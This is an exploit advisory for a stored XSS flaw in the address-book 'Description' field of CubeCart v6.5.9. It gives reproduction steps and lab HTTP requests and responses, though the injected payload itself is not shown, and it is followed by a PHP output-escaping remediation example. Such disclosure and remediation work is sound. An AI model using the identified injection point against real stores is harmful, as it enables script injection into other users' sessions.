# Exploit Title: Stored XSS in "Description" Functionality - CubeCart v6.5.9
# Date: 05/2025
# Exploit Author: Andrey Stoykov
# Version: 6.5.9
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/

Stored XSS #1:

Steps to Reproduce:

1. Visit "Account" > "Address Book" and choose "Edit"
2. In the "Description" parameter enter the following payload

// HTTP POST Request
POST /cubecart/index.php?_a=addressbook&action=edit&address_id=1 HTTP/1.1
Host: 192.168.58.186
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0
[...]

------geckoformboundary6f5a64973a1e97b9d4b5c2a0d79601a6
Content-Disposition: form-data; name="description"

------geckoformboundary6f5a64973a1e97b9d4b5c2a0d79601a6
Content-Disposition: form-data; name="title"
[...]

// HTTP Response
HTTP/1.1 302 Found
Date: Sun, 18 May 2025 12:16:17 GMT
Server: Apache/2.4.56 (Unix) OpenSSL/1.1.1t PHP/8.2.4 mod_perl/2.0.12 Perl/v5.34.1
X-Frame-Options: SAMEORIGIN
X-Powered-By: PHP/8.2.4
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
[...]

// HTTP GET Request
GET /cubecart/index.php?_a=addressbook HTTP/1.1
Host: 192.168.58.186
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0
[...]

// HTTP Response
HTTP/1.1 200 OK
Date: Sun, 18 May 2025 12:16:41 GMT
Server: Apache/2.4.56 (Unix) OpenSSL/1.1.1t PHP/8.2.4 mod_perl/2.0.12 Perl/v5.34.1
X-Frame-Options: SAMEORIGIN
X-Powered-By: PHP/8.2.4
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: CC_1349B74620=k6fd07i7h211fg1d69p5mvkuru;Expires=Monday, 19-May-2025 12:16:41 UTC;Domain=.192.168.58.186;Path=/cubecart;HttpOnly
Vary: Accept-Encoding
Content-Length: 42139
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
[...]
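The root cause of a stored XSS like the one above is that the address-book "description" value is rendered into HTML without context-aware output encoding. The following PHP is an added remediation example, not CubeCart code: the function names and the $address array layout are assumptions, and the sample description is constructed.

```php
<?php
// Added example (not CubeCart code): escape untrusted address-book fields
// for the HTML body context right before rendering. Function names and
// the $address array layout are assumptions for illustration.

declare(strict_types=1);

/**
 * Encode a user-supplied string for safe interpolation into HTML text or a
 * double-quoted attribute. ENT_QUOTES also encodes single quotes;
 * ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string,
 * which would otherwise silently drop the field.
 */
function escapeHtml(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/**
 * Render one address-book row. Every field loaded from the database goes
 * through escapeHtml(), so stored markup is displayed as text, not parsed.
 */
function renderAddressRow(array $address): string
{
    return sprintf(
        '<tr><td>%s</td><td>%s</td></tr>',
        escapeHtml($address['title'] ?? ''),
        escapeHtml($address['description'] ?? '')
    );
}

// Constructed sample: a description containing the characters that matter
// in an HTML context (angle brackets, quotes, ampersand).
$sample = [
    'title'       => 'Home',
    'description' => '<b>Office & "Warehouse"</b>',
];

$row = renderAddressRow($sample);

// The stored value must not survive as a tag; it must appear as entities.
assert(strpos($row, '<b>') === false);
assert(strpos($row, '&lt;b&gt;Office &amp; &quot;Warehouse&quot;&lt;/b&gt;') !== false);

echo $row, PHP_EOL;
```

The same value would need a different encoder if it were ever placed inside a JavaScript string or a URL, so the escaping step belongs at the point of output, chosen per context, rather than once at storage time.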